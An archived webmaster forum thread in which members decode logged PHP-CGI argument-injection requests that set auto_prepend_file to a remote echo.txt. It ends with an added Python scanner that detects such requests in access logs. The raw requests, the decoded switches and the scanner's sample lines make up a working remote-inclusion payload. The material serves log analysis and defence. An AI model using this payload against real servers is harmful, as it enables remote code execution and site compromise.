Forum Moderators: Ocean10000 & incrediBILL

GET Request

   
7:38 pm on Nov 16, 2012 (gmt 0)



The php got it 403'd

However, I do not have the savvy to understand this request.

<> SPRINT-WIRELESS

68.240.0.0/13 = 68.240.0.0 - 68.247.255.255

68.240.116.xxx - - [16/Nov/2012:06:14:36 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F211.172.112.7%3A8080%2Fecho.txt HTTP/1.1" 403 3251 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

TIA,
Ken

[edited by: incrediBILL at 5:20 am (utc) on Nov 17, 2012]
[edit reason] added line breaks [/edit]

9:22 am on Nov 17, 2012 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



This is obviously a hack attempt, trying to inject a script. I wonder if you sent a complaint to SPRINT w/ log snippet whether they'd take any action?
9:40 am on Nov 17, 2012 (gmt 0)

5+ Year Member



It's a variant of the Remote File Inclusion exploit, attempting to pull in a bad file named 'echo.txt' from port 8080 on a server in Seoul, Korea (211.172.112.n:8080).
The Korean organization is 'Iosystem' (211.172.112.0/23), who live at the unfortunately-named 'Sukchon-Dong, Songpa-gu'. Go figure.
10:17 am on Nov 17, 2012 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



It's a little more intelligible if you decode:

-dsafe_mode=Off
+-ddisable_functions=NULL
+-dallow_url_fopen=On
+-dallow_url_include=On
+-dauto_prepend_file=http://{filename as identified by iamzippy, above}

I suppose Dong in Korean means something utterly boring like Smith or Street. (I asked g###, but the translator played dumb because it wasn't in Korean script.)

:: off to see if URL is duly mentioned in htaccess ::
12:03 pm on Nov 18, 2012 (gmt 0)



Thanks everyone, I've been lurking around for about 3 years now and I have learned a lot from you folks - your expertise has been a great help.

Ken
10:03 pm on Nov 25, 2012 (gmt 0)



Different IP - almost same Request & UA

67.181.147.xxx - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F50.22.136.150%3A8080%2Fecho.txt HTTP/1.1" 403 3195 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"
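
A log check for the request pattern discussed in this thread, added here as an example and not posted by any participant: it decodes the query string the way lucy24 did by hand, lists the `-d` overrides, and notes whether the request was refused. The sample lines are constructed with documentation-range addresses, and the names `ini_overrides` and `scan` are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines modelled on the requests logged in this thread;
# the addresses are documentation ranges, not the ones posted above.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Nov/2012:06:14:36 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F198.51.100.7%3A8080%2Fecho.txt HTTP/1.1" 403 3251 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [16/Nov/2012:06:15:02 -0800] "GET /index.php?-download+list HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [16/Nov/2012:06:16:40 -0800] "GET /search.php?q=-dsafe_mode+question HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
DIRECTIVE_RE = re.compile(r'^-d([A-Za-z0-9_.]+)=(.*)$')  # -dname=value, as decoded in the thread
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
INCLUDE_DIRECTIVES = ("auto_prepend_file", "auto_append_file")

def ini_overrides(raw_query):
    """Return {directive: value} for -d switches hidden in a raw query string."""
    # Both logged requests send every '=' as %3d, so a literal '=' means an
    # ordinary key=value query and is skipped (heuristic taken from those lines).
    if not raw_query or "=" in raw_query:
        return {}
    found = {}
    for token in unquote_plus(raw_query).split():  # '+' decodes to a space
        m = DIRECTIVE_RE.match(token)
        if m:
            found[m.group(1)] = m.group(2)
    return found

def scan(lines):
    """Return one finding per log line whose query carries ini overrides."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        overrides = ini_overrides(query)
        if not overrides:
            continue
        remote = [v for k, v in overrides.items()
                  if k in INCLUDE_DIRECTIVES and REMOTE_URL_RE.match(v)]
        findings.append({"ip": ip, "path": path, "overrides": overrides,
                         "remote_include": remote,
                         # a 2xx answer means the request was not refused: investigate
                         "served": status.startswith("2")})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
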
 
